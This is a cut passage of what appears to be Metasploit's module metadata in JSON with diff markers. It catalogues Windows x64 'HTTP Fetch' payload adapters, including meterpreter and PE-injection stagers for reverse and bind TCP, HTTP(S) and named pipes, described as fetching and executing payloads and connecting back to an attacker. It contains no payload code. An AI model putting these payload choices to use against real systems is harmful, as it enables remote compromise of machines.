null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/meterpreter/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/meterpreter/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_cmd/windows/http/x64/meterpreter/bind_tcp_uuid": { - "name": "HTTP Fetch, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/http/x64/meterpreter/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/meterpreter/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/meterpreter/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": 
"windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/http/x64/meterpreter/reverse_http": { - "name": "HTTP Fetch, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/http/x64/meterpreter/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/meterpreter/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_http", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_http" - }, - "payload_cmd/windows/http/x64/meterpreter/reverse_https": { - "name": "HTTP Fetch, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/http/x64/meterpreter/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "agix", - "rwincey" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - 
"URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/meterpreter/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_https", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_https" - }, - "payload_cmd/windows/http/x64/meterpreter/reverse_named_pipe": { - "name": "HTTP Fetch, Windows x64 Reverse Named Pipe (SMB) Stager", - "fullname": "payload/cmd/windows/http/x64/meterpreter/reverse_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker via a named pipe pivot", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/meterpreter/reverse_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": 
"windows/x64/meterpreter/reverse_named_pipe", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_named_pipe" - }, - "payload_cmd/windows/http/x64/meterpreter/reverse_tcp": { - "name": "HTTP Fetch, Windows x64 Reverse TCP Stager", - "fullname": "payload/cmd/windows/http/x64/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_cmd/windows/http/x64/meterpreter/reverse_tcp_rc4": { - "name": "HTTP Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/http/x64/meterpreter/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the 
attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/meterpreter/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/http/x64/meterpreter/reverse_tcp_uuid": { - "name": "HTTP Fetch, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/http/x64/meterpreter/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/meterpreter/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": 
false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/http/x64/meterpreter/reverse_winhttp": { - "name": "HTTP Fetch, Windows x64 Reverse HTTP Stager (winhttp)", - "fullname": "payload/cmd/windows/http/x64/meterpreter/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nTunnel communication over HTTP (Windows x64 winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/meterpreter/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_winhttp", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_winhttp" - }, - "payload_cmd/windows/http/x64/meterpreter/reverse_winhttps": { - "name": "HTTP Fetch, Windows x64 Reverse HTTPS Stager (winhttp)", - "fullname": "payload/cmd/windows/http/x64/meterpreter/reverse_winhttps", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": 
"Fetch and execute an x64 payload from an HTTP server.\nTunnel communication over HTTPS (Windows x64 winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/meterpreter/reverse_winhttps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_winhttps", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_winhttps" - }, - "payload_cmd/windows/http/x64/meterpreter_bind_named_pipe": { - "name": "HTTP Fetch, Windows Meterpreter Shell, Bind Named Pipe Inline (x64)", - "fullname": "payload/cmd/windows/http/x64/meterpreter_bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "UserExistsError", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect to victim and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/meterpreter_bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/meterpreter_bind_named_pipe", - "staged": false - }, - "payload_cmd/windows/http/x64/meterpreter_bind_tcp": { - "name": "HTTP Fetch, Windows Meterpreter Shell, Bind TCP Inline (x64)", - "fullname": "payload/cmd/windows/http/x64/meterpreter_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "OJ Reeves", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect to victim and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/meterpreter_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/meterpreter_bind_tcp", - "staged": false - }, - "payload_cmd/windows/http/x64/meterpreter_reverse_http": { - "name": "HTTP Fetch, Windows Meterpreter Shell, Reverse HTTP Inline (x64)", - "fullname": "payload/cmd/windows/http/x64/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "OJ Reeves", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/windows/http/x64/meterpreter_reverse_https": { - "name": "HTTP Fetch, Windows Meterpreter Shell, Reverse HTTPS Inline (x64)", - "fullname": "payload/cmd/windows/http/x64/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "OJ Reeves", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/windows/http/x64/meterpreter_reverse_ipv6_tcp": { - "name": "HTTP Fetch, Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)", - "fullname": "payload/cmd/windows/http/x64/meterpreter_reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "OJ Reeves", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/meterpreter_reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/meterpreter_reverse_ipv6_tcp", - "staged": false - }, - "payload_cmd/windows/http/x64/meterpreter_reverse_tcp": { - "name": "HTTP Fetch, Windows Meterpreter Shell, Reverse TCP Inline x64", - "fullname": "payload/cmd/windows/http/x64/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "OJ Reeves", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/http/x64/peinject/bind_ipv6_tcp": { - "name": "HTTP Fetch, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/cmd/windows/http/x64/peinject/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for an IPv6 connection (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/peinject/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/peinject/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": 
"windows/x64/bind_ipv6_tcp" - }, - "payload_cmd/windows/http/x64/peinject/bind_ipv6_tcp_uuid": { - "name": "HTTP Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/http/x64/peinject/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/peinject/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/peinject/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/http/x64/peinject/bind_named_pipe": { - "name": "HTTP Fetch, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/http/x64/peinject/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "UserExistsError" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a pipe connection (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - 
"mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/peinject/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/peinject/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_cmd/windows/http/x64/peinject/bind_tcp": { - "name": "HTTP Fetch, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/http/x64/peinject/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/peinject/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/peinject/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/http/x64/peinject/bind_tcp_rc4": { - "name": "HTTP Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/http/x64/peinject/bind_tcp_rc4", - "aliases": [], - "rank": 300, - 
"disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "hdm ", - "skape ", - "sf ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/peinject/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/peinject/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_cmd/windows/http/x64/peinject/bind_tcp_uuid": { - "name": "HTTP Fetch, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/http/x64/peinject/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/peinject/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - 
"notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/peinject/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/http/x64/peinject/reverse_named_pipe": { - "name": "HTTP Fetch, Windows x64 Reverse Named Pipe (SMB) Stager", - "fullname": "payload/cmd/windows/http/x64/peinject/reverse_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker via a named pipe pivot", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/peinject/reverse_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/peinject/reverse_named_pipe", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/reverse_named_pipe" - }, - "payload_cmd/windows/http/x64/peinject/reverse_tcp": { - "name": "HTTP Fetch, Windows x64 Reverse TCP Stager", - "fullname": "payload/cmd/windows/http/x64/peinject/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker (Windows 
x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/peinject/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/peinject/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_cmd/windows/http/x64/peinject/reverse_tcp_rc4": { - "name": "HTTP Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/http/x64/peinject/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "hdm ", - "skape ", - "sf ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/peinject/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/peinject/reverse_tcp_rc4", - "staged": true, - "stage_refname": 
